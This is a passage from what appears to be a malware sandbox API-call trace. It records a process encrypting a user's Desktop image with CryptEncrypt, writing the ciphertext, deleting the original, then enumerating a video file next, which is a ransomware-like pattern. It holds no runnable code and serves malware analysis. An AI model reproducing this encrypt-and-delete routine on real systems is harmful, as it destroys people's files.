dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0121.935] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0121.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0121.936] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0121.936] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0121.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0121.936] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0121.936] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0121.937] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0121.937] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.017] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cabb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.017] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x15e76, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x15e80) returned 1 [0122.017] CharLowerBuffW (in: lpsz="byte[89729]", cchLength=0xb | out: lpsz="byte[89729]") returned 0xb [0122.018] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.018] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb000, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.018] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4506008*, pdwDataLen=0x144e790*=0x15e76, dwBufLen=0x15e80 | out: pbData=0x4506008*, pdwDataLen=0x144e790*=0x15e80) returned 1 [0122.019] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.019] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.019] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.021] WriteFile (in: hFile=0x2a0, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x15e80, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144f194*=0x15e80, lpOverlapped=0x0) returned 1 [0122.023] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0122.023] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.023] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca8c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0122.023] CryptDestroyKey (hKey=0x41ac740) returned 1 [0122.023] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.024] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.024] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.024] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0122.024] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0122.024] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0122.024] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.024] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0122.024] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0122.024] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0122.024] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.024] FreeLibrary (hLibModule=0x756e0000) returned 1 [0122.024] CloseHandle (hObject=0x258) returned 1 [0122.024] CloseHandle (hObject=0x2a0) returned 1 [0122.044] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\BbxrQ2nHZPP_A.jpg", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\BbxrQ2nHZPP_A.jpg", lpFilePart=0x0) returned 0x29 [0122.045] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\BbxrQ2nHZPP_A.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\bbxrq2nhzpp_a.jpg")) returned 0x20 [0122.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0122.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0122.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0122.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0122.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0122.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0122.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0122.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0122.047] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\BbxrQ2nHZPP_A.jpg", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe32544d0, ftCreationTime.dwHighDateTime=0x1d5e188, ftLastAccessTime.dwLowDateTime=0x95acb310, ftLastAccessTime.dwHighDateTime=0x1d5e272, ftLastWriteTime.dwLowDateTime=0x95acb310, ftLastWriteTime.dwHighDateTime=0x1d5e272, nFileSizeHigh=0x0, nFileSizeLow=0x15e76, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="BbxrQ2nHZPP_A.jpg", cAlternateFileName="BBXRQ2~1.JPG")) returned 0x41ac540 [0122.047] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\BbxrQ2nHZPP_A.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\bbxrq2nhzpp_a.jpg")) returned 1 [0122.102] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe32544d0, ftCreationTime.dwHighDateTime=0x1d5e188, ftLastAccessTime.dwLowDateTime=0x95acb310, ftLastAccessTime.dwHighDateTime=0x1d5e272, ftLastWriteTime.dwLowDateTime=0x95acb310, ftLastWriteTime.dwHighDateTime=0x1d5e272, nFileSizeHigh=0x0, nFileSizeLow=0x15e76, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="BbxrQ2nHZPP_A.jpg", cAlternateFileName="BBXRQ2~1.JPG")) returned 0 [0122.103] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0122.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0122.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0122.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0122.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0122.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359c08 | out: hHeap=0x1780000) returned 1 [0122.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0122.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0122.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0122.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0122.103] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0122.103] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0122.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0122.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0122.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0122.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0122.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0122.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0122.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0122.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0122.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42da350 | out: hHeap=0x1780000) returned 1 [0122.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0122.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0122.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0122.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0122.104] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0122.104] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0122.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0122.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0122.104] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0122.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0122.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0122.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0122.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2240 [0122.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0122.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0122.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0122.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0122.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0122.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0122.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0122.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0122.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0122.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0122.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0122.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0122.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0122.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9d90 [0122.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0122.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0122.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0122.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0122.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0122.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0122.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0122.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0122.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0122.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0122.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0122.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0122.106] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0122.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0122.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0122.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0122.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0122.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0122.106] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0122.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0122.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0122.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0122.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0122.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0122.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0122.106] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\bUb qc_SLq8O.mp4", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a228cf0, ftCreationTime.dwHighDateTime=0x1d5e716, ftLastAccessTime.dwLowDateTime=0x27856890, ftLastAccessTime.dwHighDateTime=0x1d5e7e1, ftLastWriteTime.dwLowDateTime=0x27856890, ftLastWriteTime.dwHighDateTime=0x1d5e7e1, nFileSizeHigh=0x0, nFileSizeLow=0x5c27, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="bUb qc_SLq8O.mp4", cAlternateFileName="BUBQC_~1.MP4")) returned 0x41ac100 [0122.107] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0122.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0122.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0122.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0122.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0122.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0122.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0122.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392180 [0122.107] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0122.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392180 | 